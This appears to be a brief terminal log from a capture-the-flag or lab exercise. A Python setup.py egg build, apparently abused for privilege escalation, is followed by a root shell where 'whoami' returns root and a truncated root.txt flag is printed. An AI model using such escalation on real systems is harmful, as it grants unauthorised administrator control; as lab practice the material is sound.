Writing /tmp/tmp.RzxGgWYZ3q/setup.cfg
Running setup.py -q bdist_egg --dist-dir /tmp/tmp.RzxGgWYZ3q/egg-dist-tmp-UWIqp_
# whoami
root
root.txt
# cat root.txt
6ab5f72b...